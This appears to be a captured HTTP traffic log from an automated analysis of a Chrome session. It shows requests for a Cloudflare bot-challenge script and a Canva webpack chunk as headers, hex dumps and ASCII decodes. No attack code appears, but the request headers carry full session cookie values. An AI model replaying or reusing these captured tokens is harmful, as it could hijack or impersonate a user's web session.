                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC718INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:30 GMT
                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 8850
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7WhBzrUNsSD1DAGc0z5qFAjGg13FxnPW5hR8XskH88hSB969UVVN%2BTyPDHXe2szSHTlogBF17pyZjack0ctLz1CuumPL2qBkUeLkqELq%2Fbpt8eP2Q6ysaoO3XJgpclk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7a1e38ba1891-EWR
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC651INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6a 2c 6b 2c 6f 2c 73 2c 78 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 56 2c 66 2c 67 29 7b 66 6f 72 28 56 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 70 61 72 73 65 49 6e 74 28 56 28 34 33 34 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 56 28 34 33 36 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 34 30 32 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 56 28 34 30 37 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 56 28 33 39 34 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 56 28 33 38 34 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 33 34 39 29 29 2f 37 2b 70 61 72
                                                                                                                                                                                                                                                    Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,o,s,x){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=parseInt(V(434))/1*(parseInt(V(436))/2)+-parseInt(V(402))/3*(parseInt(V(407))/4)+parseInt(V(394))/5*(parseInt(V(384))/6)+-parseInt(V(349))/7+par
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 47 3b 66 6f 72 28 49 3d 6e 28 45 29 2c 67 5b 61 31 28 33 35 34 29 5d 5b 61 31 28 34 30 39 29 5d 26 26 28 49 3d 49 5b 61 31 28 34 34 36 29 5d 28 67 5b 61 31 28 33 35 34 29 5d 5b 61 31 28 34 30 39 29 5d 28 45 29 29 29 2c 49 3d 67 5b 61 31 28 33 32 34 29 5d 5b 61 31 28 33 34 33 29 5d 26 26 67 5b 61 31 28 34 33 37 29 5d 3f 67 5b 61 31 28 33 32 34 29 5d 5b 61 31 28 33 34 33 29 5d 28 6e 65 77 20 67 5b 28 61 31 28 34 33 37 29 29 5d 28 49 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 61 32 2c 50 29 7b 66 6f 72 28 61 32 3d 61 31 2c 4f 5b 61 32 28 34 32 38 29 5d 28 29 2c 50 3d 30 3b 50 3c 4f 5b 61 32 28 34 33 33 29 5d 3b 4f 5b 50 2b 31 5d 3d 3d 3d 4f 5b 50 5d 3f 4f 5b 61 32 28 33 35 36 29 5d 28 50 2b 31 2c 31 29 3a 50 2b 3d 31
                                                                                                                                                                                                                                                    Data Ascii: void 0)return G;for(I=n(E),g[a1(354)][a1(409)]&&(I=I[a1(446)](g[a1(354)][a1(409)](E))),I=g[a1(324)][a1(343)]&&g[a1(437)]?g[a1(324)][a1(343)](new g[(a1(437))](I)):function(O,a2,P){for(a2=a1,O[a2(428)](),P=0;P<O[a2(433)];O[P+1]===O[P]?O[a2(356)](P+1,1):P+=1
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 48 3c 4e 3b 50 3c 3c 3d 31 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 61 37 28 33 33 35 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 48 2b 2b 29 3b 66 6f 72 28 55 3d 4b 5b 61 37 28 33 39 30 29 5d 28 30 29 2c 48 3d 30 3b 38 3e 48 3b 50 3d 31 2e 37 32 26 55 7c 50 3c 3c 31 2e 39 38 2c 51 3d 3d 46 2d 31 3f 28 51 3d 30 2c 4f 5b 61 37 28 33 33 35 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 55 3d 31 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 50 3c 3c 31 2e 38 31 7c 55 2c 51 3d 3d 46 2d 31 3f 28 51 3d 30 2c 4f 5b 61 37 28 33 33 35 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3d 30 2c 48 2b 2b 29 3b 66 6f 72 28 55 3d 4b 5b 61 37 28 33 39 30 29 5d 28 30 29 2c 48 3d 30 3b 31 36 3e
                                                                                                                                                                                                                                                    Data Ascii: H<N;P<<=1,F-1==Q?(Q=0,O[a7(335)](G(P)),P=0):Q++,H++);for(U=K[a7(390)](0),H=0;8>H;P=1.72&U|P<<1.98,Q==F-1?(Q=0,O[a7(335)](G(P)),P=0):Q++,U>>=1,H++);}else{for(U=1,H=0;H<N;P=P<<1.81|U,Q==F-1?(Q=0,O[a7(335)](G(P)),P=0):Q++,U=0,H++);for(U=K[a7(390)](0),H=0;16>
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 55 2c 54 29 7b 66 6f 72 28 61 61 3d 61 35 2c 48 3d 5b 5d 2c 49 3d 34 2c 4a 3d 34 2c 4b 3d 33 2c 4c 3d 5b 5d 2c 4f 3d 47 28 30 29 2c 50 3d 46 2c 51 3d 31 2c 4d 3d 30 3b 33 3e 4d 3b 48 5b 4d 5d 3d 4d 2c 4d 2b 3d 31 29 3b 66 6f 72 28 52 3d 30 2c 53 3d 4d 61 74 68 5b 61 61 28 33 32 38 29 5d 28 32 2c 32 29 2c 4e 3d 31 3b 53 21 3d 4e 3b 54 3d 50 26 4f 2c 50 3e 3e 3d 31 2c 30 3d 3d 50 26 26 28 50 3d 46 2c 4f 3d 47 28 51 2b 2b 29 29 2c 52 7c 3d 28 30 3c 54 3f 31 3a 30 29 2a 4e 2c 4e 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 52 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 52 3d 30 2c 53 3d 4d 61 74 68 5b 61 61 28 33 32 38 29 5d 28 32 2c 38 29 2c 4e 3d 31 3b 4e 21 3d 53 3b 54 3d 4f 26 50 2c 50 3e 3e 3d 31 2c 30 3d 3d 50
                                                                                                                                                                                                                                                    Data Ascii: K,L,M,N,O,P,Q,R,S,U,T){for(aa=a5,H=[],I=4,J=4,K=3,L=[],O=G(0),P=F,Q=1,M=0;3>M;H[M]=M,M+=1);for(R=0,S=Math[aa(328)](2,2),N=1;S!=N;T=P&O,P>>=1,0==P&&(P=F,O=G(Q++)),R|=(0<T?1:0)*N,N<<=1);switch(R){case 0:for(R=0,S=Math[aa(328)](2,8),N=1;N!=S;T=O&P,P>>=1,0==P
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 5b 5d 3b 6e 75 6c 6c 21 3d 3d 64 3b 65 3d 65 5b 5a 28 34 34 36 29 5d 28 4f 62 6a 65 63 74 5b 5a 28 34 32 36 29 5d 28 64 29 29 2c 64 3d 4f 62 6a 65 63 74 5b 5a 28 34 34 33 29 5d 28 64 29 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 79 28 64 2c 61 62 29 7b 72 65 74 75 72 6e 20 61 62 3d 57 2c 4d 61 74 68 5b 61 62 28 33 37 38 29 5d 28 29 3c 64 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 6d 29 7b 72 65 74 75 72 6e 20 61 6d 3d 27 31 34 33 6d 41 4a 63 47 6d 2c 72 65 6d 6f 76 65 43 68 69 6c 64 2c 46 75 6e 63 74 69 6f 6e 2c 63 68 61 72 41 74 2c 31 30 4b 59 55 65 4b 79 2c 73 6f 75 72 63 65 2c 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 2c 2f 62 65 61 63 6f 6e 2f 6f 76 2c 6f 6e 65 72 72 6f 72 2c 65 72 72 6f 72 49 6e 66 6f 4f 62 6a 65 63 74 2c 73
                                                                                                                                                                                                                                                    Data Ascii: [];null!==d;e=e[Z(446)](Object[Z(426)](d)),d=Object[Z(443)](d));return e}function y(d,ab){return ab=W,Math[ab(378)]()<d}function a(am){return am='143mAJcGm,removeChild,Function,charAt,10KYUeKy,source,onreadystatechange,/beacon/ov,onerror,errorInfoObject,s
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 61 74 69 6f 6e 2c 36 79 62 66 48 78 73 2c 62 6f 64 79 2c 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 2c 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 2c 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 2c 32 38 38 35 34 38 37 45 70 62 58 79 75 2c 63 68 61 72 43 6f 64 65 41 74 2c 63 68 6c 41 70 69 55 72 6c 2c 78 68 72 2d 65 72 72 6f 72 2c 43 6f 6e 74 65 6e 74 2d 74 79 70 65 2c 31 30 32 33 32 33 30 42 43 76 69 6c 4b 2c 69 6e 64 65 78 4f 66 2c 25 32 62 2c 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 2c 70 6f 73 74 4d 65 73 73 61 67 65 2c 6f 62 6a 65 63 74 2c 73 70 6c 69 74 2c 2f 69 6e 76 69 73 69 62 6c 65 2f 6a 73 64 2c 31 35 39 33 35 31 53 4d 56 64 4c 4f 2c 63 61 74 63 68 2c 6e 6f 77 2c 33 73 72 64 37 67 76 56 6c 4e 66 75 30 51 79 4b 2d 45 6a 24 54 46 5a 63
                                                                                                                                                                                                                                                    Data Ascii: ation,6ybfHxs,body,setRequestHeader,__CF$cv$params,contentDocument,2885487EpbXyu,charCodeAt,chlApiUrl,xhr-error,Content-type,1023230BCvilK,indexOf,%2b,DOMContentLoaded,postMessage,object,split,/invisible/jsd,159351SMVdLO,catch,now,3srd7gvVlNfu0QyK-Ej$TFZc
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1354INData Raw: 28 33 33 38 29 2c 67 5b 61 34 28 33 36 30 29 5d 3d 27 2d 31 27 2c 69 5b 61 34 28 33 38 35 29 5d 5b 61 34 28 33 32 30 29 5d 28 67 29 2c 45 3d 67 5b 61 34 28 34 34 35 29 5d 2c 46 3d 7b 7d 2c 46 3d 43 53 63 62 67 36 28 45 2c 45 2c 27 27 2c 46 29 2c 46 3d 43 53 63 62 67 36 28 45 2c 45 5b 61 34 28 33 38 33 29 5d 7c 7c 45 5b 61 34 28 33 36 34 29 5d 2c 27 6e 2e 27 2c 46 29 2c 46 3d 43 53 63 62 67 36 28 45 2c 67 5b 61 34 28 33 38 38 29 5d 2c 27 64 2e 27 2c 46 29 2c 69 5b 61 34 28 33 38 35 29 5d 5b 61 34 28 34 31 33 29 5d 28 67 29 2c 47 3d 7b 7d 2c 47 2e 72 3d 46 2c 47 2e 65 3d 6e 75 6c 6c 2c 47 7d 63 61 74 63 68 28 49 29 7b 72 65 74 75 72 6e 20 48 3d 7b 7d 2c 48 2e 72 3d 7b 7d 2c 48 2e 65 3d 49 2c 48 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 28 63 2c 64 2c 65 29 7b 72
                                                                                                                                                                                                                                                    Data Ascii: (338),g[a4(360)]='-1',i[a4(385)][a4(320)](g),E=g[a4(445)],F={},F=CScbg6(E,E,'',F),F=CScbg6(E,E[a4(383)]||E[a4(364)],'n.',F),F=CScbg6(E,g[a4(388)],'d.',F),i[a4(385)][a4(413)](g),G={},G.r=F,G.e=null,G}catch(I){return H={},H.r={},H.e=I,H}}function b(c,d,e){r


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    39192.168.2.449784104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC615OUTGET /web/dd1f23ecb46acb13.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:31 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 17168
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a24fa9141e1-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71060
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "877fa88bfb6fe3a883ace013e852f98c"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:17 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:33 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: Ze0v+QXQIqs3xVBfFHAbPm9kUip9rUT4CotqKFpdMbM0xJBaXKqmV3wo+aOr3dPZlBRBnz1my8Y=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYG27QS7B8A0S39
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: .2cYOTML3mPyRXGpZ6z5P_Bw7.HnzFMI
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 5a 4b 31 59 78 37 62 46 33 48 49 68 4d 6d 6b 58 25 32 42 42 50 6f 59 67 4c 79 30 35 59 48 79 74 78 6c 4e 33 48 78 68 72 35 65 4d 63 4e 7a 4a 4d 62 73 6c 4b 57 37 50 6b 33 77 73 34 38 39 64 47 36 42 6e 56 4d 36 6d 70 25 32 42 65 6a 48 57 6f 46 32 33 25 32 42 38 39 53 53 56 6d 5a 68 53 6d 75 4b 74 73 37 45 62 4f 49 76 67 33 48 61 33 36 63 64 64 7a 6b 49 6c 70 72 51 55 25 32 46 61 6d 34 68 4b 43 6f 54 73 68 4f 75 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZK1Yx7bF3HIhMmkX%2BBPoYgLy05YHytxlN3Hxhr5eMcNzJMbslKW7Pk3ws489dG6BnVM6mp%2BejHWoF23%2B89SSVmZhSmuKts7EbOIvg3Ha36cddzkIlprQU%2Fam4hKCoTshOuY%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1196INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 39 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 36 36 35 30 35 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72 65
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[495],{/***/ 665054:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_re
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 30 5d 3b 74 68 72 6f 77 20 63 3b 7d 7d 2c 51 7a 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 74 72 69 6d 28 29 2e 73 70 6c 69 74 28 2f 5c 73 2b 2f 2c 32 29 2e 6d 61 70 28 62 3d 3e 5f 5f 63 2e 67 78 28 62 29 5b 30 5d 29 2e 6a 6f 69 6e 28 22 22 29 7d 2c 54 7a 62 3d 66 75 6e 63 74 69 6f 6e 28 61 3d 22 22 29 7b 61 3d 52 7a 62 28 61 29 3b 61 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 61 28 29 2a 53 7a 62 2e 6c 65 6e 67 74 68 29 3b 72 65 74 75 72 6e 20 53 7a 62 5b 61 5d 7d 2c 56 7a 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 3d 22 6d 65 64 69 75 6d 22 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 61 26 26 0a 76 6f 69 64 20 30 21 3d 3d 61 26 26 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 63 3d 28 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 62 3f 62
                                                                                                                                                                                                                                                    Data Ascii: 0];throw c;}},Qzb=function(a){return a.trim().split(/\s+/,2).map(b=>__c.gx(b)[0]).join("")},Tzb=function(a=""){a=Rzb(a);a=Math.floor(a()*Szb.length);return Szb[a]},Vzb=function(a,b="medium"){if(null!==a&&void 0!==a&&a.length){var c=("number"===typeof b?b
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 7c 7c 7a 3d 3d 3d 64 41 62 2c 63 68 69 6c 64 72 65 6e 3a 77 3d 3d 3d 62 3f 61 3a 79 7d 29 7d 29 7d 2c 77 29 29 2c 72 2e 65 76 65 72 79 28 77 3d 3e 77 2e 6b 65 79 21 3d 3d 62 29 26 26 58 36 28 24 7a 62 2c 7b 69 6e 3a 21 31 2c 74 69 6d 65 6f 75 74 3a 66 2c 63 6c 61 73 73 4e 61 6d 65 73 3a 70 2c 6d 6f 75 6e 74 4f 6e 45 6e 74 65 72 3a 21 30 2c 75 6e 6d 6f 75 6e 74 4f 6e 45 78 69 74 3a 21 65 2c 6e 6f 64 65 52 65 66 3a 71 28 62 29 2c 6f 6e 45 78 69 74 65 64 3a 65 3f 76 6f 69 64 20 30 3a 75 28 62 29 2c 63 68 69 6c 64 72 65 6e 3a 77 3d 3e 58 36 28 61 41 62 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 77 2c 63 68 69 6c 64 72 65 6e 3a 58 36 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 59 36 28 22 54 33 75 7a 35 51 22 2c 6e 29 2c 72 65 66 3a 71 28 62
                                                                                                                                                                                                                                                    Data Ascii: ||z===dAb,children:w===b?a:y})})},w)),r.every(w=>w.key!==b)&&X6($zb,{in:!1,timeout:f,classNames:p,mountOnEnter:!0,unmountOnExit:!e,nodeRef:q(b),onExited:e?void 0:u(b),children:w=>X6(aAb.Provider,{value:w,children:X6("div",{className:Y6("T3uz5Q",n),ref:q(b
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 3d 0a 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 3d 3e 7b 61 2e 77 66 3f 61 2e 77 66 2e 52 48 28 6e 65 77 20 6e 41 62 28 7b 69 64 3a 63 2c 65 78 74 65 6e 73 69 6f 6e 3a 64 7d 29 29 2e 74 68 65 6e 28 28 7b 64 6f 63 75 6d 65 6e 74 3a 67 7d 29 3d 3e 7b 63 6f 6e 73 74 20 68 3d 67 2e 5a 66 2e 63 6f 6e 74 65 6e 74 2e 74 69 74 6c 65 3b 68 3f 28 24 36 28 28 29 3d 3e 61 2e 53 70 61 2e 73 65 74 28 62 2c 7b 73 74 61 74 75 73 3a 31 2c 74 69 74 6c 65 3a 68 7d 29 29 2c 66 28 68 29 29 3a 66 28 76 6f 69 64 20 30 29 7d 29 2e 63 61 74 63 68 28 28 29 3d 3e 7b 24 36 28 28 29 3d 3e 61 2e 53 70 61 2e 73 65 74 28 62 2c 7b 73 74 61 74 75 73 3a 32 7d 29 29 3b 66 28 76 6f 69 64 20 30 29 7d 29 3a 66 28 76 6f 69 64 20 30 29 7d 29 3b 61 2e 70 72 6f 6d 69 73 65 73 2e 73 65 74 28 62 2c 65
                                                                                                                                                                                                                                                    Data Ascii: =new Promise(f=>{a.wf?a.wf.RH(new nAb({id:c,extension:d})).then(({document:g})=>{const h=g.Zf.content.title;h?($6(()=>a.Spa.set(b,{status:1,title:h})),f(h)):f(void 0)}).catch(()=>{$6(()=>a.Spa.set(b,{status:2}));f(void 0)}):f(void 0)});a.promises.set(b,e
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 61 44 2c 75 41 62 3d 65 37 2e 70 36 2c 56 36 3d 65 37 2e 46 6c 2c 76 41 62 3d 65 37 2e 4c 4f 2c 66 37 3d 65 37 2e 76 50 2c 24 36 3d 65 37 2e 7a 3b 76 61 72 20 4e 7a 62 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 36 34 39 37 39 39 29 2e 4f 6d 3b 76 61 72 20 77 41 62 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2c 78 41 62 3d 77 41 62 28 39 39 33 38 36 34 29 2c 59 36 3d 77 41 62 2e 6e 5f 78 28 78 41 62 29 28 29 3b 76 61 72 20 52 7a 62 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 35 30 33 32 31 36 29 3b 76 61 72 20 24 7a 62 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 34 38 39 32 31 32 29 2e 5a 3b 76 61 72 20 67 37 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 39 32 30 30
                                                                                                                                                                                                                                                    Data Ascii: aD,uAb=e7.p6,V6=e7.Fl,vAb=e7.LO,f7=e7.vP,$6=e7.z;var Nzb=__webpack_require__(649799).Om;var wAb=__webpack_require__,xAb=wAb(993864),Y6=wAb.n_x(xAb)();var Rzb=__webpack_require__(503216);var $zb=__webpack_require__(489212).Z;var g7=__webpack_require__(9200
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 29 3b 63 61 73 65 20 22 73 65 6c 65 63 74 22 3a 72 65 74 75 72 6e 20 6e 65 77 20 42 41 62 28 61 29 3b 0a 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 42 28 61 29 3b 7d 7d 29 3b 76 61 72 20 4b 7a 62 3d 63 6c 61 73 73 7b 73 74 61 74 69 63 20 42 28 61 29 7b 4c 28 61 2c 7b 73 74 79 6c 65 3a 56 36 2c 64 61 74 65 3a 56 36 2c 74 65 78 74 3a 56 36 7d 29 7d 67 65 74 20 73 74 79 6c 65 28 29 7b 72 65 74 75 72 6e 20 32 7d 67 65 74 20 64 61 74 65 28 29 7b 76 61 72 20 61 3b 28 61 3d 32 3d 3d 3d 74 68 69 73 2e 50 71 2e 51 70 2e 74 79 70 65 3f 74 68 69 73 2e 50 71 2e 51 70 2e 64 61 74 65 3a 76 6f 69 64 20 30 29 7c 7c 28 61 3d 6e 65 77 20 44 61 74 65 2c 61 3d 5f 5f 63 2e 6a 77 28 61 29 2c 61 3d 7b 79 65 61 72 3a 61 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2c 6d
                                                                                                                                                                                                                                                    Data Ascii: );case "select":return new BAb(a);default:throw new B(a);}});var Kzb=class{static B(a){L(a,{style:V6,date:V6,text:V6})}get style(){return 2}get date(){var a;(a=2===this.Pq.Qp.type?this.Pq.Qp.date:void 0)||(a=new Date,a=__c.jw(a),a={year:a.getFullYear(),m
